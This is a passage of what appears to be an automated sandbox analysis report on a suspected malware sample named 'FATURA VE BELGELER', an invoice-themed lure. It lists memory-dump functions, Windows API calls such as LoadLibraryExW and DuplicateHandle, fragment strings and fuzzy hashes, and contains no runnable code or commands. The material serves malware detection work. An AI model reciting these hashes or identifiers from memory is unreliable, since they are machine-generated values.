Strings

7#\, xrefs: 066B4B84

Memory Dump Source

Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd

Similarity

API ID: Current$ProcessThread
String ID: 7#\
API String ID: 2063062207-3014239955
Opcode ID: 4e86c520ae2132d0497e92d26a7397823e6149824cd877b3aa836bf2e37f92ae
Instruction ID: 28c3d807437b1708364985f6e26abff0b61707fca412c133fe9a476ef1368c1e
Opcode Fuzzy Hash: 4e86c520ae2132d0497e92d26a7397823e6149824cd877b3aa836bf2e37f92ae
Instruction Fuzzy Hash: F65146B0D00249CFDB94DFAAD948BEEBBF1EF48304F208459E019A7361DB395984CB65

Uniqueness

Uniqueness Score: -1.00%

Function 066BF632 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 212
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

7#\, xrefs: 066BF77E
7#\, xrefs: 066BF79E

Memory Dump Source

Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 7#\$7#\
API String ID: 0-3751469010
Opcode ID: b573789a3def26e6fdabcf1f49e1439e3af5c1dd00295f01afac90d741767ed6
Instruction ID: 9e01d774d94330edeb61373c0c3f1279663a293517eaef2f0bb0dc82d2eba538
Opcode Fuzzy Hash: b573789a3def26e6fdabcf1f49e1439e3af5c1dd00295f01afac90d741767ed6
Instruction Fuzzy Hash: 1C715871C05388EFCB12CFA9D8509CEBFB5BF4A300F14919AE414AB262C7719995CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 066BD84C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066BF862

Strings

7#\, xrefs: 066BF77E
7#\, xrefs: 066BF79E

Memory Dump Source

Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd

Similarity

API ID: CreateWindow
String ID: 7#\$7#\
API String ID: 716092398-3751469010
Opcode ID: 0d8ef463d932179a94c7fe5b0f111765c21a8e98e48e0e73c873646807d69518
Instruction ID: 60e49ad051015e3c9a618500377fd3efa520e09c26ad880647afaff1f98e9f71
Opcode Fuzzy Hash: 0d8ef463d932179a94c7fe5b0f111765c21a8e98e48e0e73c873646807d69518
Instruction Fuzzy Hash: 6D51C4B1D10309EFDB54CF9AC884ADDBBB5FF48310F24912AE418A7260D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02818849 Relevance: 4.3, Strings: 3, Instructions: 501COMMON

Download Yara Rule

Strings

4']q, xrefs: 02818871
;]q, xrefs: 02818C8C
4']q, xrefs: 02818897

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 4']q$4']q$;]q
API String ID: 0-1096896373
Opcode ID: e0b1ee4ebf67c203f4d4043edc989bca4196ac20e72e217bd8215a9b059083de
Instruction ID: 0ae116c0f58ff82c3f0546e3ed2dfab89965aff9da27d0fa8e0b417c29279d66
Opcode Fuzzy Hash: e0b1ee4ebf67c203f4d4043edc989bca4196ac20e72e217bd8215a9b059083de
Instruction Fuzzy Hash: F4F1A07C3052018FFB195B29C95AB39379EAF85748F1844AAE40ACF3E1EB29DC41C742

Uniqueness

Uniqueness Score: -1.00%

Function 066BD168 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197COMMON

Download Yara Rule

Strings

7#\, xrefs: 066BD377

Memory Dump Source

Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd

Similarity

API ID: HandleModule
String ID: 7#\
API String ID: 4139908857-3014239955
Opcode ID: c476cef8254ee050b23706997bf862843b30a491a015924a59e700678a8e2e28
Instruction ID: 1d9e01689d4c2d49bcd089fa5731f89ba7e21c9d6c72049326b6eed4c8756924
Opcode Fuzzy Hash: c476cef8254ee050b23706997bf862843b30a491a015924a59e700678a8e2e28
Instruction Fuzzy Hash: 63712370A00B45CFD7A4DF69D45079ABBF5FF88200F048A2DD58A9BB50D734E946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 066B4834 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,066B4D76,?,?,?,?,?), ref: 066B4E37

Strings

7#\, xrefs: 066B4DCF

Memory Dump Source

Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd

Similarity

API ID: DuplicateHandle
String ID: 7#\
API String ID: 3793708945-3014239955
Opcode ID: 5012d0bfe68115cb93bb22000382f752fd0f8e341e2162ab7fc6e5818545c8ca
Instruction ID: aae4bb0aeaed6fd81b68826d6af03851388ca758fbf6fca54794ee9821c73110
Opcode Fuzzy Hash: 5012d0bfe68115cb93bb22000382f752fd0f8e341e2162ab7fc6e5818545c8ca
Instruction Fuzzy Hash: 082105B5900248DFDB10CF9AD584AEEBBF8EB48310F10841AE918A3310C378A951CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 066B4DAA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,066B4D76,?,?,?,?,?), ref: 066B4E37

Strings

7#\, xrefs: 066B4DCF

Memory Dump Source

Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd

Similarity

API ID: DuplicateHandle
String ID: 7#\
API String ID: 3793708945-3014239955
Opcode ID: 0466f10a7678a9d66a935af8660cc0e792dcb2bc70c393e72acff3a792942e36
Instruction ID: 3561245cc6bf1ef40d78117a62b8db8f483316ab2654c41b24dd5ea74f43c999
Opcode Fuzzy Hash: 0466f10a7678a9d66a935af8660cc0e792dcb2bc70c393e72acff3a792942e36
Instruction Fuzzy Hash: C521D2B59002489FDB10CFAAD984ADEBBF5FB48310F14841AE918A3310D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 066BD5B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,066BD439,00000800,00000000,00000000), ref: 066BD62A

Strings

7#\, xrefs: 066BD5DF

Memory Dump Source

Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd

Similarity

API ID: LibraryLoad
String ID: 7#\
API String ID: 1029625771-3014239955
Opcode ID: 6bc376fad75bce11632e906c4bc483d34bd206b1ebc97dd0055fbce99455a2ad
Instruction ID: 30c734a71271f6ef5454aceae8945d8b6f7b2f1211789a356713d790f2c8fa74
Opcode Fuzzy Hash: 6bc376fad75bce11632e906c4bc483d34bd206b1ebc97dd0055fbce99455a2ad
Instruction Fuzzy Hash: 261103B6D002089FCB10CFAAD444ADEFBF8EF48310F10842AE519A7210D379A685CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 066BC148 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,066BD439,00000800,00000000,00000000), ref: 066BD62A

Strings

7#\, xrefs: 066BD5DF

Memory Dump Source

Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd

Similarity

API ID: LibraryLoad
String ID: 7#\
API String ID: 1029625771-3014239955
Opcode ID: ede34aaf5993d0e57ecae42cb29428242c10669ffc573b5cce5db3eca040b5ed
Instruction ID: 5dd8ce1d1127543eefe553f1a86e001f044621e1cd35927f3da73c44b5ad5c26
Opcode Fuzzy Hash: ede34aaf5993d0e57ecae42cb29428242c10669ffc573b5cce5db3eca040b5ed
Instruction Fuzzy Hash: E51114B6D00209CFDB10DF9AD444ADEFBF4EF48310F14842AE519A7200D379A545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 066BC100 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,066BD184), ref: 066BD3BE

Strings

7#\, xrefs: 066BD377

Memory Dump Source

Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd

Similarity

API ID: HandleModule
String ID: 7#\
API String ID: 4139908857-3014239955
Opcode ID: d213ef3747ca0c2d0b7b7e956893df2b7ef4fe4c48a8c8cf32d9fc627e944510
Instruction ID: 10569ab6d4ae0146fcb0c1ed6b8f4f907298bf57553a633ad78bce7aa15229a4
Opcode Fuzzy Hash: d213ef3747ca0c2d0b7b7e956893df2b7ef4fe4c48a8c8cf32d9fc627e944510
Instruction Fuzzy Hash: 271132B5C00349CFCB50DF9AC444ADEFBF4EF89214F10942AD519A7200C378A985CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02817850 Relevance: 3.2, Strings: 2, Instructions: 706COMMON

Download Yara Rule

Strings

$]q, xrefs: 02818397
$]q, xrefs: 02818374

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 55dd4423d69b5c422f8a1a57291424cdbe0249129004d8114370fb1f987358e7
Instruction ID: 4a9a56fad49e07deea678a49c2253b8ce11df3ea72630246a3012d99556d54f7
Opcode Fuzzy Hash: 55dd4423d69b5c422f8a1a57291424cdbe0249129004d8114370fb1f987358e7
Instruction Fuzzy Hash: 17527678A0021CCFEB15DBA4C851B9EBB76EF84300F1081A9D10AA73A6DF355E45DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02815700 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

Haq, xrefs: 028157EB
Haq, xrefs: 0281581E

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: c20587b5b49a0d6ce9332f965df239665133b00890c63e22ced6f60e3d13d78a
Instruction ID: 38c1d982a63bbea99b3366c274fd2b5d6d31499d54efd231be5056c8e536f17f
Opcode Fuzzy Hash: c20587b5b49a0d6ce9332f965df239665133b00890c63e22ced6f60e3d13d78a
Instruction Fuzzy Hash: 1FB1BE3C7442548FDB159F28D494B6E7BAAAFC8314F448869E84ACB3D1DB78DC12CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06692830 Relevance: 2.7, Strings: 2, Instructions: 236COMMON

Download Yara Rule

Strings

LR]q, xrefs: 06692979
LR]q, xrefs: 0669284C

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: LR]q$LR]q
API String ID: 0-3917262905
Opcode ID: 8488fd52dc7d257d65bf06b77b3b9d8f89700fc684fbff26d6aa4cc4c53dbcec
Instruction ID: a96a9706f0aaace79ecc43f2348a10c3d7ff8d533c41e01a6fc764c45ac0b3a6
Opcode Fuzzy Hash: 8488fd52dc7d257d65bf06b77b3b9d8f89700fc684fbff26d6aa4cc4c53dbcec
Instruction Fuzzy Hash: E581E535B201059FCB58DF79C46496E77BAFF88614B118569E406DB3B1DB30EE02CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02815C60 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

,aq, xrefs: 02815D36
,aq, xrefs: 02815D40

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: ,aq$,aq
API String ID: 0-2990736959
Opcode ID: 5b513f60e82f0395f135cd473b6c4ad06bb191b6de05e8dc76bd63608291b269
Instruction ID: 8eef6888c85f79186ca9d653997ae5b16b157f2c63d3a29ed367b516af0995cd
Opcode Fuzzy Hash: 5b513f60e82f0395f135cd473b6c4ad06bb191b6de05e8dc76bd63608291b269
Instruction Fuzzy Hash: BB81A27CA00109CFCB14CF69C488A6AB7FAFFC8308B958169D419DB3A5D739E841CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06699960 Relevance: 2.7, Strings: 2, Instructions: 211COMMON

Download Yara Rule

Strings

(aq, xrefs: 06699B3A
(&]q, xrefs: 06699A7B

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: (&]q$(aq
API String ID: 0-1602648543
Opcode ID: c11c94a7042a635afead751ac32331ea3a75ef06aae3da7fa190436f3ed88764
Instruction ID: f81ff6fad9748d6ab88092ad0b8dbb3e8e405c9fc9fadc8a4b92434a5500e56e
Opcode Fuzzy Hash: c11c94a7042a635afead751ac32331ea3a75ef06aae3da7fa190436f3ed88764
Instruction Fuzzy Hash: A2718031F002199BDF55DFA9D8906EEBBB6EF88700F148529E805A7384DF34AD02C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 02813480 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xaq, xrefs: 0281348D
Xaq, xrefs: 028134B6

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: Xaq$Xaq
API String ID: 0-1488805882
Opcode ID: d913346e7569bb7407ac367fb8c44975daa19db830339ab5104389526c2eacbf
Instruction ID: 2a371fd8d2cc70192dc47b819843ecba85f8b97e3e7c1c1cf269d618b342c9ca
Opcode Fuzzy Hash: d913346e7569bb7407ac367fb8c44975daa19db830339ab5104389526c2eacbf
Instruction Fuzzy Hash: 2431F73DB003198BDF194A6A99953BE66EEEBC4614F188479E81BD33C4DB78C845C2A1

Uniqueness

Uniqueness Score: -1.00%

Function 02810C8F Relevance: 1.7, Strings: 1, Instructions: 419COMMON

Download Yara Rule

Strings

LR]q, xrefs: 02810E80

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 0b5ad694a32a89d1dd8af11596489549471c9ef0a15c7639664f0a9f4c431e68
Instruction ID: 78a3e43d8e7ae6e33afa79f0d0d2db817d362a6cb40e4c77d28f33e9edecf47b
Opcode Fuzzy Hash: 0b5ad694a32a89d1dd8af11596489549471c9ef0a15c7639664f0a9f4c431e68
Instruction Fuzzy Hash: B922CE7C941219CFCB54EF68E984A9DBBB5FF88301F1089A5E409A7358EB356D4ACF40

Uniqueness

Uniqueness Score: -1.00%

Function 02810CA0 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

LR]q, xrefs: 02810E80

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 32be02bc4f5c5870ef5832033b8f1a78befc857fa186ad8ddbb9dbb1d24540d1
Instruction ID: addf428aab325ad3e3165d94106c481c75f880934802077395309ef36a1cdd57
Opcode Fuzzy Hash: 32be02bc4f5c5870ef5832033b8f1a78befc857fa186ad8ddbb9dbb1d24540d1
Instruction Fuzzy Hash: 2D22CD7C900219CFCB54EF68E984A9DBBB5FF88301F1089A5E509A7358EB356D4ACF40

Uniqueness

Uniqueness Score: -1.00%

Function 0281A6B0 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

(o]q, xrefs: 0281A839

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: (o]q
API String ID: 0-794736227
Opcode ID: 13829c83416c45ec9caed743fcea8dfb78cd8959b5cc0586c8c016615b4f2cd3
Instruction ID: 6e9b8cb536b539b088fae3df144279403d951e37836f92049d698eb6b78f0b11
Opcode Fuzzy Hash: 13829c83416c45ec9caed743fcea8dfb78cd8959b5cc0586c8c016615b4f2cd3
Instruction Fuzzy Hash: 9641E339B002048FCB19AF79D8546AE7BBBEFC9610F148869D906D73D1DE358C06CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0281FDA8 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

-)1#, xrefs: 0281FDC6

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: -)1#
API String ID: 0-1789991113
Opcode ID: a328a9e2eec3c7ff1291f4b1795d3a9ede565428b154f81963cf9fa1b802611b
Instruction ID: 5830fa4bd7de27224e61cc50ae4e53d3bd94c3895e27ebfc9504bb9139be3cac
Opcode Fuzzy Hash: a328a9e2eec3c7ff1291f4b1795d3a9ede565428b154f81963cf9fa1b802611b
Instruction Fuzzy Hash: CC218079A003098BDB14EFA8C05569EBBB6EF48708F204459C50AFB781CB759D45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0669E510 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

W, xrefs: 0669E51D

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 9475b5da2378af6df529228a554c9b8043bf155c92b5170e507e2037188910c3
Instruction ID: 4f3fb5ba3ae635e0da13def2cb1d6aaf7569747766bbd2bc6d403ced735990de
Opcode Fuzzy Hash: 9475b5da2378af6df529228a554c9b8043bf155c92b5170e507e2037188910c3
Instruction Fuzzy Hash: A41108357092808FD7054A3958682BBAFAF9FCA310F0888B7E946C72D7DD398C068771

Uniqueness

Uniqueness Score: -1.00%

Function 06699710 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

7#\, xrefs: 06699E0A

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 7#\
API String ID: 0-3014239955
Opcode ID: 9853bd002db693348f911b088e346f872479a9988f33a56295ad87fc283bc7d9
Instruction ID: 0e7adbf1f09372154ca4bae9b148604020802cf375c1d0fe26dadbd0afebbce2
Opcode Fuzzy Hash: 9853bd002db693348f911b088e346f872479a9988f33a56295ad87fc283bc7d9
Instruction Fuzzy Hash: 771156B68006499FDF10CF99C945BEEBFF8EF48320F148419EA18A7210C339A554DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06699DE9 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

7#\, xrefs: 06699E0A

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 7#\
API String ID: 0-3014239955
Opcode ID: 63dcfa468b2aaa98dff0f013fdcd57e46d282d264fd85ea2f3c57a58f3eec34b
Instruction ID: 260ade9f662f4c866aba42b41758d02cfb9b2c09eea4c410334c3236f5f9f5c8
Opcode Fuzzy Hash: 63dcfa468b2aaa98dff0f013fdcd57e46d282d264fd85ea2f3c57a58f3eec34b
Instruction Fuzzy Hash: EE1114B68002499FDF10DF99C845BDEBFF8EF48320F148419EA28A7250C339A554DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0281A878 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23de80ba77d35792827d6f571f288de9fd541d32f9885a04877e829c627e759b
Instruction ID: d0c5fd0819e614905083bab858505ab234459a570c54d12ba27597d5d696ea51
Opcode Fuzzy Hash: 23de80ba77d35792827d6f571f288de9fd541d32f9885a04877e829c627e759b
Instruction Fuzzy Hash: AFF13D79B012148FCB08CF69D584AADBBFAFF88314B168059E419EB3A5CB35EC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02814F61 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6216a18d2ada08e10c16684a676398f89c13656a8389bfa83f9481912587fe5c
Instruction ID: b344ae21f4569c9ba7f41fee7b445e96109760f6cb2ff3646788a365e374d908
Opcode Fuzzy Hash: 6216a18d2ada08e10c16684a676398f89c13656a8389bfa83f9481912587fe5c
Instruction Fuzzy Hash: BAB1567C240349DFD70ABB65F654B153BAAEBD8300F104824B815137ADCB3BAC5BDA69

Uniqueness

Uniqueness Score: -1.00%

Function 02814F70 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 705f79dc0c8e45a0ebce3f592641e7690a4783c041a95c39d6640c8577912dca
Instruction ID: f471eedb3d3086f42664ceeb8e75fae93d5048f5c38a0f46fdd5ca946f46d9fb
Opcode Fuzzy Hash: 705f79dc0c8e45a0ebce3f592641e7690a4783c041a95c39d6640c8577912dca
Instruction Fuzzy Hash: BCB1567C240349DFD60ABB65F654B153BABEBD8300F108824B815137ADCB3BAC57DA69

Uniqueness

Uniqueness Score: -1.00%

Function 02817498 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c8c0b04598005feb6dd89b8e8f4327860827a8641cab90025d9a79b1ab8b79
Instruction ID: 245315586c55abb4eb07e59c213e8c4cc0a0bef88b99c219ab33709fecae2c55
Opcode Fuzzy Hash: c8c8c0b04598005feb6dd89b8e8f4327860827a8641cab90025d9a79b1ab8b79
Instruction Fuzzy Hash: 2271E87C7402058FCB15DF28C898AADBBEAAF49754F1544A9E40ACB3B1DB74DC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 066915E9 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a0e1668ab4f64c175909a6e161456d53ff3d67273df2663363ef347c0d5d3f
Instruction ID: 0e8e4148be0d33a6b98e39375afc1b5c8690f324625fc2f057b640904ce70800
Opcode Fuzzy Hash: 06a0e1668ab4f64c175909a6e161456d53ff3d67273df2663363ef347c0d5d3f
Instruction Fuzzy Hash: AF81A074E412299FDB65DF69DD40BDDBBB2BB89300F1084EAE849A7290DB305E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0281D3C2 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2a25fc8fa317aed921d49206218ab6dabdf77039048344843834a8a14f405dd
Instruction ID: 0a6f413fd8570cab4e7b6cf63b0efa3cb73dcc2baa397ee9b411ec16736a91b1
Opcode Fuzzy Hash: d2a25fc8fa317aed921d49206218ab6dabdf77039048344843834a8a14f405dd
Instruction Fuzzy Hash: F851DD7A8A6746CFD3043B32B9AC12A7BA0FB4F3233406C12F42E954A6DB301069DA50

Uniqueness

Uniqueness Score: -1.00%

Function 0281D3D0 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49a056b54b28157054a888f49cd3125b691de3faae11f01b8b9e07d38c238833
Instruction ID: ae84f9017bc41b70870b0991deb4693e724056712b57b30bbb967d8e32673485
Opcode Fuzzy Hash: 49a056b54b28157054a888f49cd3125b691de3faae11f01b8b9e07d38c238833
Instruction Fuzzy Hash: B951AE7A8A6B46CF93043B36BAAC12A7BA4FB4F7237407C11F42E954A5DB701068DA50

Uniqueness

Uniqueness Score: -1.00%

Function 0281D719 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52856936d8dcc6739ef9ed7f02d1e372a3b23932d7f2c6e6e45de54df134db2f
Instruction ID: 7ea24c115ba7e0a12f596100e98178788a40364e8c4b193f4083f1eeb9d65dc2
Opcode Fuzzy Hash: 52856936d8dcc6739ef9ed7f02d1e372a3b23932d7f2c6e6e45de54df134db2f
Instruction Fuzzy Hash: 15510678E112088FCB04EFA9D480ADDBBF6FF89304F549529D409EB299DB349946CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0281E7B9 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
